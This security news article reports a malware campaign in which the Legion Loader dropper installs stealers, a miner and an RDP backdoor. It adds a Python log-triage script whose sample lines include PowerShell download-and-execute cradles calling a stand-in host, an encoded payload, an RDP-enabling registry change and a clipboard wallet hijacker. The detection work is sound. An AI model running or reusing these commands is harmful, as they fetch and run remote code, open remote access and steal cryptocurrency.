Researchers at Deep Instinct have detected a malware distribution campaign that delivers a package of six malware variants in a single infection. The package includes a backdoor, a cryptojacker, a cryptocurrency stealer, and several information-stealing Trojans.
Deep Instinct has called the campaign Hornet’s Nest due to the sheer number of threats being delivered. The campaign starts with the delivery of a malware dropper dubbed Legion Loader, which is believed to have been developed by a Russian language speaker, although it is not known if the threat actors behind the campaign are based in Russia. The targets so far are mostly located in the United States and Europe.
Once installed, the dropper, which is compiled with Microsoft Visual C++ 8, fetches and runs its payloads using PowerShell commands. The payloads are Predator the Thief, which can capture webcam footage; the Vidar information stealer; and the highly customizable Raccoon Stealer. An RDP-based backdoor is also delivered, giving the attackers remote access to the compromised machine, and a cryptocurrency miner and a PowerShell-based cryptocurrency stealer are downloaded. Legion Loader appears to be under active development and uses a variety of methods to avoid detection by sandboxes.
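Because the payloads are pulled down and executed through PowerShell, PowerShell script block logging (event ID 4104) is where a defender would look for this stage. The following is an added example of how such logs can be triaged for download-and-execute indicators; it is not code from Deep Instinct or from the campaign, and the indicators it checks (download cradles, inline execution, hidden-window and bypass switches, encoded commands, RDP being enabled through the registry, clipboard access of the kind clipboard-replacing cryptocurrency stealers rely on) are generic PowerShell tradecraft, not recovered Legion Loader commands. The sample log lines, the TEST-NET address and the weights are constructed for the example.

```python
"""Heuristic triage of PowerShell script block log lines (event 4104 style).

Added example: generic payload-delivery indicators, not the campaign's real commands.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (name, pattern, weight). Weights are illustrative judgement calls for this example.
INDICATORS = [
    ("download cradle",
     re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I), 2),
    ("inline execution (IEX)", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 1),
    ("stealth/bypass switches",
     re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop(?:rofile)?\b", re.I), 1),
    ("spawns a process", re.compile(r"\bStart-Process\b", re.I), 1),
    ("enables RDP via registry", re.compile(r"fDenyTSConnections\b.*\b0\b", re.I), 3),
    ("reads/writes clipboard", re.compile(r"Get-Clipboard|Set-Clipboard|Windows\.Forms\.Clipboard", re.I), 2),
]
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
ENCODED_WEIGHT = 2
ALERT_THRESHOLD = 2


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(line: str) -> Optional[str]:
    """Return the hidden script if the line carries an -EncodedCommand blob, else None."""
    m = ENCODED_RE.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (ValueError, binascii.Error):
        return None  # not a valid blob; leave it to the plain-text checks
    return raw.decode("utf-16-le", errors="replace")


@dataclass
class Finding:
    line: str
    score: int = 0
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def analyze_line(line: str) -> Finding:
    """Score one log line; the decoded payload of an encoded command is scanned too."""
    finding = Finding(line=line)
    decoded = decode_encoded_command(line)
    if decoded is not None:
        finding.decoded = decoded
        finding.indicators.append("encoded command")
        finding.score += ENCODED_WEIGHT
    haystack = line if decoded is None else line + "\n" + decoded
    for name, pattern, weight in INDICATORS:
        if pattern.search(haystack):
            finding.indicators.append(name)
            finding.score += weight
    return finding


def scan(lines) -> List[Finding]:
    """Return findings at or above ALERT_THRESHOLD, highest score first."""
    hits = [f for f in (analyze_line(ln) for ln in lines) if f.score >= ALERT_THRESHOLD]
    return sorted(hits, key=lambda f: f.score, reverse=True)


# Constructed sample lines shaped like script block log entries. They are invented
# for this example (203.0.113.0/24 is TEST-NET-3) and are not Legion Loader commands.
_HIDDEN_SCRIPT = ("(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/m.exe',"
                  "'C:\\ProgramData\\m.exe'); Start-Process 'C:\\ProgramData\\m.exe'")
SAMPLE_LOG = [
    "2019-12-19T10:01:02 pid=4120 ScriptBlockText: Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "2019-12-19T10:01:07 pid=4188 ScriptBlockText: powershell -nop -w hidden -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')\"",
    "2019-12-19T10:01:09 pid=4190 ScriptBlockText: powershell -EncodedCommand " + encode_powershell(_HIDDEN_SCRIPT),
    "2019-12-19T10:01:12 pid=4204 ScriptBlockText: Set-ItemProperty "
    "'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' -Name fDenyTSConnections -Value 0",
    "2019-12-19T10:01:15 pid=4210 ScriptBlockText: while($true){ if((Get-Clipboard) -match "
    "'^(1|3)[A-Za-z0-9]{25,34}$'){ Set-Clipboard 'ATTACKER_WALLET' }; Start-Sleep 1 }",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"score={f.score}: {', '.join(f.indicators)}")
        print("  " + f.line[:110])
        if f.decoded:
            print("  decoded: " + f.decoded[:110])
```

Scoring the decoded payload alongside the visible command line matters: an `-EncodedCommand` blob hides the download cradle from any rule that only inspects the raw text. The benign `Get-ChildItem` line scores zero, while the RDP registry change is weighted high enough to alert on its own, since there are few legitimate reasons for a script to flip `fDenyTSConnections` to 0.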
Deep Instinct researchers believe the aim of the campaign is to infect businesses with multiple malware variants whose access and data could then be offered under a cybercrime-as-a-service model. The package also allows the attackers to steal large volumes of sensitive personal data, which could be sold on darknet marketplaces or used in further attacks on the organization. Legion Loader may not be particularly sophisticated, but the payloads it delivers can cause a considerable amount of harm.
The researchers have not yet determined how the Legion Loader dropper is being distributed. In the meantime, standard cybersecurity best practices offer protection: apply patches promptly, secure internet-facing ports and services (the package includes an RDP-based backdoor, so exposed or newly enabled RDP deserves particular attention), use advanced email security solutions to block malspam, and use a web filter to block exploit kits and other malicious websites. Because the payloads are fetched with PowerShell commands, enabling PowerShell script block logging also gives defenders a record of what was run if a host is compromised.